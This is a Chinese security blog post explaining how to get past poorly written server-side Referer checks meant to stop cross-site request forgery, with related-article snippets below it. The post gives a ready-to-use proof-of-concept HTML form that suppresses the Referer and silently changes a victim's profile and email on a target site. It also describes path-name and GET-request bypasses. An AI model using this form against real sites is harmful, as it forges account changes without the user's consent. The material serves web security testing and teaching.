CSRF绕过后端Referer校验

最新推荐文章于 2023-11-02 17:45:04 发布
最新推荐文章于 2023-11-02 17:45:04 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 技术
原文链接:https://www.colorgg.com
版权

CSRF绕过后端Referer校验分正常情况和不正常的情况,我们这里主要讨论开发在写校验referer程序时,不正常的情况下怎么进行绕过。

正常情况

正常的情况指服务器端校验Referer的代码没毛病,那么意味着前端是无法绕过的。

我之前考虑过的方案:

  • JS修改Referer,失败;
  • 让用户点击第三方网站,但是浏览器就是使用第三方网站的referer,失败;

不正常的情况

不正常的情况指服务器端校验Referer的代码有漏洞,前端才能做到绕过,下面介绍几个可能会绕过Referer的案例;

添加无Referer标签

可以尝试无Referer标签,万一逻辑刚好没判断无Referer的情况呢;

<meta name="referrer" content="never">

<html>
  <meta name="referrer" content="never">
  <body>
  <script>history.pushState('', '', '/')</script>  <!-- 实现浏览器页面不刷新修改url链接 -->
    <form action="http://www.baidu.com/setProfile" method="POST">
      <input type="hidden" name="nickname" value="new22" />
      <input type="hidden" name="email" value="1&#64;1&#46;com" />
      <input type="hidden" name="team" value="new22" />
      <input type="hidden" name="address" value="new33" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Web站点路径带着referer字段名

原理就是在恶意网站的访问路径上创建成包含原本referer中有的字段名,如果服务端的校验规则只是判断是否包含,那就666了;


GET型CSRF

检验了HTTP Referer就一点问题都没有了吗?答案是:否定的,HTTP Referer只能检查点击的链接来源是来自站内还是站外,如果是GET方式的CSRF,那链接本身就是站内的,也就意味着检验HTTP Referer是无效的。

深蓝旭
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSRF Referer技巧
2ed
10-14 1197
1.Refere为空条件下 解决方案: 利用ftp://,http://,https://,file://,javascript:,data:这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的话,这些请求的Referer都是空的。 例: 利用data:协议 <html> <body> <iframe sr...
csrf过token
Bu2n的博客
02-12 1610
以pikachu靶场为例,过token讲解 https://www.bilibili.com/video/BV1qm4y1Z7o5/ 钓鱼网站源码 pikachu_csrf_token.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Document</title> </head> <body>
当微信服务器的图片与公众号第三方授权功能在项目里同时存在时设置referrer报错的解决方案
Lofan 的博客
07-16 897
继 【上传到微信服务器的图片在前端显示“此图片未经允许不可使用”】 这篇文章之后衍生出来的问题: 如果你单纯解决微信图片防盗链的问题,那上面这篇文章的解决方案就可以搞定。 但是!! 如果你的项目里除了前端显示的图片是从微信服务器返回的以外,恰好项目里又有公众号第三方授权功能的,就比较尴尬了。 那,什么是 第三方平台公众号授权 ? 就是公众号管理员把自己的公众号授权给第三方平台,授权后,第三方平台可以代替公众号,执行相应的权限,比如说获取公众号的相关信息 微信图片链接,这样的: http://m
CSRF   花式Referer技巧
weixin_34266504的博客
02-03 523
做项目遇到Referer过的情况 有同事问起 这几天不是很忙 就把自己知道的方法记录下。有条件限制 不一定所有的Refere验证就可以过1.Refere为空条件下解决方案: 利用ftp://,http://,https://,file://,javascript:,data:这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的...
csrfReferer技巧
一米八多的瑞兹的博客
12-22 1557
1. Referer防御CSRF原理 HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器基此可以获得一些信息用于处理。当用户点击被构造好的CSRF利用页面,那么在执行用户对应操作时,提交的HTTP请求中就有对应的Referer值,此时服务端判断Referer值是否与服务器的域名信息有关。如果不相关则不执行操作。 2. Referer防御代码编写 在PHP中使用 $_SERVER[‘HTTP_REFERER
CSRF - 空Referer
weixin_34024034的博客
11-19 243
在实际环境中,服务器很多CGI由于一些历史原因,必须允许空Referer的请求。比如:老的客户端版本请求的时候就没有Referer,总不能在服务端一刀切,让老版本的用户都无法正常使用了吧。 这样的CGI就存在CSRF攻击的风险。那么我们该如何在真实环境中构造一个可利用的POC呢? 我们知道正常的页面跳转,浏览器都会自动带上Referer,那么现在的问题就变成了什么情况下浏览器会不带Refere...
CSRF实战案例—referer值验证
good good study
12-21 2750
在一个添加管理员的界面引起了我的注意
csrfReferer技巧-01
09-15
CSRFReferer技巧详解 CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web攻击方式,攻击者可以通过构造恶意页面诱骗用户执行非法操作。为了防御CSRF攻击,Web开发者通常会使用Referer头来判断...
csrf校验插件-js
05-03
使用该插件可以在使用js向后端提交数据时进行csrf校验
解决django前后端分离csrf验证的问题
09-19
在前后端分离的Web开发模式下,Django的CSRF(Cross Site Request Forgery,跨站请求伪造)保护机制可能会引发问题,因为它主要是为传统的基于表单的提交设计的。然而,现代应用往往使用Ajax进行异步通信,这就需要...
SQL注入中的WAF过技术
08-19
SQL注入中的WAF过技术,里面的思路很好,可以学习一下
Python库 | asgi-csrf-0.7.1.tar.gz
03-03
`asgi-csrf`是一个专门用于ASGI(Asynchronous Server Gateway Interface)应用程序的CSRF防护库,它支持异步处理,适用于现代Python后端框架,如Django Channels或FastAPI。 ### CSRF攻击概述 CSRF攻击是一种非...
CSRF--花式Referer技巧
11-25 258
CSRF遇到Referer过的情况,有条件限制,不一定所有的Refere验证就可以过 1.Refere为空条件下 解决方案: 利用ftp://,http://,https://,file://,javascript:,data:这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的话,这些请求的Referer都是空的。 例...
web安全--CSRF
fabao007的专栏
05-02 719
你们都知道CSRF是什么,如果不是的话,您就不会出现在我的博客上。今天,在本文中,我将解释对测试网站的CSRF保护的四个简单测试,这些测试可能会导致CSRF过,这反过来可以为您赚钱。 1. 在帐户之间使用CSRF令牌 最简单和最致命的CSRF过是当应用程序不验证CSRF令牌是否绑定到特定帐户而仅验证算法时。为了验证这一点 从帐户A登录到应用程序 转到其密码更改页面 使用b...
CSRF防御
weixin_50464560的博客
08-10 845
CSRF漏洞很容易就可以被发现并利用。一眼看去很多站点好像在这方面都做得不错:当你检查针对敏感操作的请求时,他们往往会实施CSRF保护。有时候可能是一个在请求主体中的CSRF token,也有可能是一个referer字段检测,或者有时是一个特殊的HTTP头字段或者cookie字段。 但是CSRF的防御不代表它就不可以被过。今天我们讨论一些我如何CSRF防御措施的技术。 所有的CSRF 不管哪种CSRF防御措施部署,你都可以先尝试如下两件事:点击劫持和更改请求方法。 点击劫持 在同一个功能端点利用点击劫
【10.15总结】CSRFReferer保护
weixin_30449453的博客
10-15 364
今天下午可能要出远门,所以现在就把总结写好了。 Write-up地址:[Critical] Bypass CSRF protection on IBM 这个CSRF漏洞存在于IBM的修改邮箱页面,修改邮箱的地址是 https://www.ibm.com/ibmweb/myibm/account/sendmail?locale=us-en&email=NEW_EMAIL 所...
CSRF过与利用
mingyqf的博客
03-24 192
Threezh1’Blog 转载至:https://threezh1.com/2020/02/25/CSRF%E7%BB%95%E8%BF%87%E6%95%B4%E7%90%86/ CSRF过与利用 February 25th 2020, 12:00:00 pm 目录 Origin & Referer Bypass Null值过 域名校验过 配合XSS进行利用 获取表单中的token 获取url参数中的token 配合URL跳转漏洞 X-Request-with Bypas
CSRF攻击(2), Referer防御
探测???
11-02 740
这里可以看到 Referer 中由于包含了文件名, 所以就间接包含有目标服务器的ip, 过了后端对 SERVER_NAME 的判断, 密码修改成功.这里看到表单类型的链接, 点击后 Referer 只包含攻击者的ip, 并没有目标ip, 因此被防御.策略,这将导致浏览器在Referer头中发送完整的URL,为了避免出现这种情况, 可以在HTML文件中使用。当使用一个普通的表单类型的钓鱼链接时, 比如。, 浏览器会根据这个策略发送Referer头.标签会指示浏览器在发送请求时使用。
Caché数据库及其特性.pdf
最新发布
07-19
本文对Caché数据库相关概念、架构、前景、特性、实现及应用进行了简洁的介绍和阐述,并用较大篇幅对Caché数据库独一无二的架构设计和特性实现进行了详细的说明和解释,期间,结合实例对相关概念和知识进行了解析,以期各位同学对该数据库进行初步了解和学习,为进一步深入学习和掌握打下良好的基础。
csrftoken过正则表达式
09-08
总结起来,过正则表达式来csrftoken的验证可以通过使用空referer、指定域过或结合其他漏洞攻击等方法来实现。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值